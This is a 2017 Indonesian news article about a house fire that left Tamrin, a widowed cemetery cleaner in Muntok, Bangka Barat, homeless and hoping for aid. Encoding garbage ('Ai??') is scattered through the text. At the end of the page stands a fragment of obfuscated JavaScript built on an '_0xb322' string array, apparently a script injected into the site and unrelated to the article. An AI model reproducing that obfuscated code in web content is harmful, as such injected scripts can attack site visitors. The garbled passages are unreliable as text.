Meski Dapat Menerima Musibah Kebakaran, Tamrin Berharap Adanya Bantuan

KORANFORUM.COM, MUNTOK, BABEL Ai??– Nasib naas menimpa Tamrin (52), Warga Ai??Kampung Menjelang RT 3 RW 03, Kecamatan Muntok, Kabupaten Bangka Barat (Babar) Provinsi BangkaAi?? Belitung (Babel).

Pasalnya, rumah satu-satu miliknya, pada Selasa (4/7/2017) lalu, tanpa ampun ludes dilalap ai???si jago merahai???, hingga tinggal puing-puing dan abu bekas pembakaran api yang berserakan. Tamrin sendiri, kesehariannya dikenal sebagai petugas pembersih pemakaman di Kampung Menjelang.Ai??

“Saya mulai datang ke Bangka dari tahun 2002 silam. Sedangkan saya asli orang Sulawesi, namun almarhumah istri saya asli Bangka sini. Makanya semua saudaranya kebanyakan tinggal di Kampung Menjelang ini,ai??? ungkap Tamrin.Ai??

Sebelum rumah yang di tempati hangus dilalap si jago merah, Tamrin hidup sebatang kara, yaitu semenjak istrinya meninggal sekitar dua tahun yang lalu, yang diduga akibat sakit tumor yang dideritanya. Sebenarnya Thamrim memiliki dua orang anak tiri. Namun saat ini, Thamrin hidup tanpa ditemani dua anak tirinya tersebut.Ai??

Berdasarkan informasi yang diperoleh KoranForum.Com, terjadinya musibah kebakaran ini diduga disebabkan api yang berasal dari tungkuk kayu api, dimana pada saat itu Thamrin baru selasai memasak nasi. Lalu, sekitar Pukul 20.00 WIB, tanpa menyangka bakal terjadi musibah ini, maka Thamrin pergi dari rumahnya untuk bertandang ke rumah temannya, yang kebetulan jaraknya tidak jauh dari rumah.Ai??

Tidak berapa lama itulah, yaitu saat Thamrin berada di rumah temannya itu, secara tiba-tiba istri temannya itu memanggil dirinya, sambil memberitahukan adanya kobaran api, yang dilihat saat itu berasal dari arah tempat tinggal Thamrin.Ai??

“Atok, apa tadi ada bikin api ya? terus saya jawab, ada, karena tadi saya baru sudah masak nasi. Tapi udah dimatiin. Lalu istri teman saya itu menjawab, keliatannya ada api berasal dari rumah Atok. Coba dilihat dulu,” beber Tamrin, saat menjelaskan kronologi awal terjadinya kebakaran yang menimpa kediamannya, pada hari Selasa (4/7/17) malam lalu.Ai??

Lalu, sekitar Pukul 20.30 WIB, hampir semua warga berteriak adanya kobaran cahaya api, yang diduga kuat berasal dari rumah Atok Tamrin. Meski awalnya, mereka hanya melihat ada cahaya api dari kejauhan, tetapi saat dihampiri lebih dekat lagi, ternyata api telah melalap sebagian besar rumah Atok Thamrin hingga tidak tersisa satu pun benda berharga.Ai??

Sesaat kemudian, terlihat dua unit mobil kebakaran dari PT Timah Tbk dan satu unit lagi dari Pemda Bangka Barat, diturunkan untuk membantu pemadaman api. Untuk mempercepat padamnya api, maka upaya pemadaman dibantu juga sejumlah petugas dari Kantor Damkar, Pol PP, Babinsa Koramil, anggota Polres Babar, serta didukung juga tenaga dari warga sekitar kediaman Atok Thamrin.

Saat itu, Tamrin menambahkan bahwa dirinya mendapat bantuan berupa tenda sementara. Fakta ini Ia ungkapkan langsung kepada wartawan KoranForum.Com dan SatuBabel.Com, saat berada di lokasi kejadian kebakaran, Rabu (4/7/17) sore lalu.

“Alhamdulillah, saya mendapatkan bantuan tenda dari Dinas Sosial (Dinsos Pemkab Babar) hari ini, yang sudah terpasang untuk tempat tinggal sementara,” tambahnya, saat itu.

Thamrin berharap, meski dirinya menerima musibah ini dengan penuh kesabaran, namun Ia berkata,Ai??semoga setelah musibah yang telah terjadi ini, dirinya mendapat bantuan dari pihak relawan yang berupaya membantunya untuk memulihkan kembali kondisi rumahnya seperti semula dan mengganti barang-barang yang telah hangus terbakar. (arie/alif)

Ai??

Ai??

+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12])=== -1){alert(_0xb322[23])}

You May Also Like

Leave a Reply

Your email address will not be published. Required fields are marked *